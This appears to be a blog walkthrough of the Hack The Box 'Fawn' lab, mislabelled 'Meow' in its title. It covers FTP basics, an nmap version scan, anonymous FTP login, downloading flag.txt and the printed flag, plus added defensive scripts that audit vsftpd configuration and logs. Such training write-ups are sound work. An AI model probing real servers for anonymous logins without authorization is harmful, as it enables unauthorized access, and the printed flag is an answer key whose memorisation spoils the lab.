Solving HTB Meow CTF: A Step-by-Step Guide | System Weakness

Welcome to our comprehensive guide on solving the HTB Fawn challenge. Join us as we delve into FTP acronyms, ports, scanning techniques, and ultimately obtain the coveted root flag. Get ready to sharpen your cyber security skills!

What does the 3-letter acronym FTP stand for?

File Transfer Protocol

FTP stands for File Transfer Protocol. It is a standard network protocol used for transferring files between a client and a server on a computer network.

Which port does the FTP service listen on usually?

21

The FTP service typically listens on port 21. This port is reserved for FTP communication.

What acronym is used for the secure version of FTP?

sftp

The secure version of FTP is known as SFTP, which stands for Secure File Transfer Protocol. SFTP provides encryption and secure authentication for file transfers.

What is the command we can use to send an ICMP echo request to test our connection to the target?

ping

The command to send an ICMP echo request, commonly known as a ping, is ping.

From your scans, what version is FTP running on the target?

# nmap -sV 10.129.16.241
Starting Nmap 7.94 ( ) at 2023-06-28 13:03 +03
Nmap scan report for 10.129.16.241
Host is up (0.19s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 2.57 seconds

To determine the version of FTP running on the target, you can use a network scanning tool like Nmap. Running the command nmap -sV (service and version detection) gathers information about open ports and the services behind them. Look for the FTP service in the scan results; its VERSION column shows the server software and version. For example, “vsftpd 3.0.3” indicates that the FTP server on the target is vsftpd version 3.0.3.

From your scans, what OS type is running on the target?

Service Info: OS: Unix

When analyzing the scan results from Nmap or similar tools, look for the “Service Info” section. In this case, it states “OS: Unix,” indicating that the target is running a Unix-based operating system.

What is the command we need to run in order to display the ‘ftp’ client help menu?

ftp -h

To display the help menu for the ‘ftp’ client, you can run the command ftp -h.

What is the username that is used over FTP when you want to log in without having an account?

# ftp 10.129.16.241
Connected to 10.129.16.241.
220 (vsFTPd 3.0.3)
Name (10.129.16.241:kami): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

When connecting to an FTP server without having an account, you can use the username “anonymous”.
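
The anonymous login above works only because the server's configuration allows it. As an added example (not part of the original write-up), this Python sketch audits a vsftpd.conf for the options that control anonymous access and TLS; both sample configurations are constructed for illustration, and the finding messages are this example's own wording.

```python
# Constructed sample: a permissive configuration.
WEAK_CONF = """\
listen=YES
anonymous_enable=YES
no_anon_password=YES
write_enable=YES
anon_upload_enable=YES
"""

# Constructed sample: anonymous access off, TLS required for local users.
HARDENED_CONF = """\
listen=YES
anonymous_enable=NO
local_enable=YES
ssl_enable=YES
force_local_logins_ssl=YES
force_local_data_ssl=YES
"""

def parse_conf(text):
    """Return {option: value}; vsftpd.conf lines are option=value."""
    opts = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        opts[key.strip().lower()] = value.strip()
    return opts

def audit(text):
    """List the anonymous-access and cleartext findings for one config."""
    opts = parse_conf(text)
    def on(key, default):
        return opts.get(key, default).upper() == "YES"
    findings = []
    # Built-in default for anonymous_enable is YES: a missing line means enabled.
    if on("anonymous_enable", "YES"):
        findings.append("anonymous login enabled")
        if on("no_anon_password", "NO"):
            findings.append("anonymous login skips the password prompt")
        if on("write_enable", "NO") and on("anon_upload_enable", "NO"):
            findings.append("anonymous users can upload")
    if not on("ssl_enable", "NO"):
        findings.append("no TLS: logins and files cross the network in cleartext")
    return findings

if __name__ == "__main__":
    for conf in (WEAK_CONF, HARDENED_CONF):
        print(audit(conf))
```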

What is the response code we get for the FTP message ‘Login successful’?

230 Login successful.

The response code for the FTP message ‘Login successful’ is “230”.

There are a couple of commands we can use to list the files and directories available on the FTP server. One is dir. What is the other that is a common way to list files on a Linux system?

ftp> ls
229 Entering Extended Passive Mode (|||57579|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt
226 Directory send OK.
ftp> ls -al
229 Entering Extended Passive Mode (|||28843|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 121 4096 Jun 04 2021 .
drwxr-xr-x 2 0 121 4096 Jun 04 2021 ..
-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt
226 Directory send OK.

In addition to the dir command, a common way to list files on a Linux system is to use the ls command.

What is the command used to download the file we found on the FTP server?

ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||47631|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |****************************| 32 0.55 KiB/s 00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (0.10 KiB/s)
ftp>

Use the get command to retrieve a file from the FTP server. For instance, if you discovered a file named “flag.txt” on the server, the command get flag.txt downloads it to your local system.
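
On the server side, the same login and download leave a trail. As an added example (not part of the original write-up), this Python sketch pulls anonymous logins and downloads out of a vsftpd log; the log lines and client addresses are constructed, and their layout is modelled on vsftpd's native log format as an assumption, so adjust the pattern to what your server actually writes.

```python
import re
from collections import defaultdict

# Constructed sample lines; layout modelled on vsftpd's log format (assumption).
SAMPLE_LOG = '''\
Wed Jun 28 13:04:10 2023 [pid 901] CONNECT: Client "10.10.14.7"
Wed Jun 28 13:04:12 2023 [pid 900] [ftp] OK LOGIN: Client "10.10.14.7", anon password "x"
Wed Jun 28 13:04:30 2023 [pid 902] [ftp] OK DOWNLOAD: Client "10.10.14.7", "/flag.txt", 32 bytes, 0.55Kbyte/sec
Wed Jun 28 13:09:02 2023 [pid 910] [alice] OK LOGIN: Client "10.10.20.3"
Wed Jun 28 13:09:20 2023 [pid 912] [alice] OK DOWNLOAD: Client "10.10.20.3", "/home/alice/report.pdf", 2048 bytes, 12.00Kbyte/sec
'''

# [pid N] [user] OK|FAIL ACTION: Client "ip"[, "path"]
EVENT = re.compile(
    r'\[pid \d+\] \[(?P<user>[^\]]+)\] (?P<status>OK|FAIL) (?P<action>[A-Z]+): '
    r'Client "(?P<client>[^"]+)"(?:, "(?P<path>[^"]+)")?'
)

# Account names treated as anonymous sessions (assumption for this example).
ANON_USERS = {"ftp", "anonymous"}

def anonymous_activity(log_text):
    """Map client IP -> {'logins': n, 'downloads': [paths]} for anonymous sessions."""
    report = defaultdict(lambda: {"logins": 0, "downloads": []})
    for line in log_text.splitlines():
        m = EVENT.search(line)
        if not m or m["status"] != "OK" or m["user"] not in ANON_USERS:
            continue
        entry = report[m["client"]]
        if m["action"] == "LOGIN":
            entry["logins"] += 1
        elif m["action"] == "DOWNLOAD":
            entry["downloads"].append(m["path"])
    return dict(report)

if __name__ == "__main__":
    for client, seen in anonymous_activity(SAMPLE_LOG).items():
        print(client, seen)
```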

Submit root flag

cat flag.txt
035db21c881520061c53e0536e44f815

After successfully downloading the file “flag.txt,” you can view its contents using the command cat flag.txt. The content of the root flag should be displayed, allowing you to submit it for verification.

In this article, we covered the step-by-step process of solving the HTB Fawn CTF challenge. We explored various aspects, including FTP acronyms, port numbers, version identification, OS type, commands for FTP interactions, and downloading and submitting the root flag. By following these instructions, you should be able to successfully complete the challenge and enhance your skills in the field of cyber security and CTFs. Happy hacking!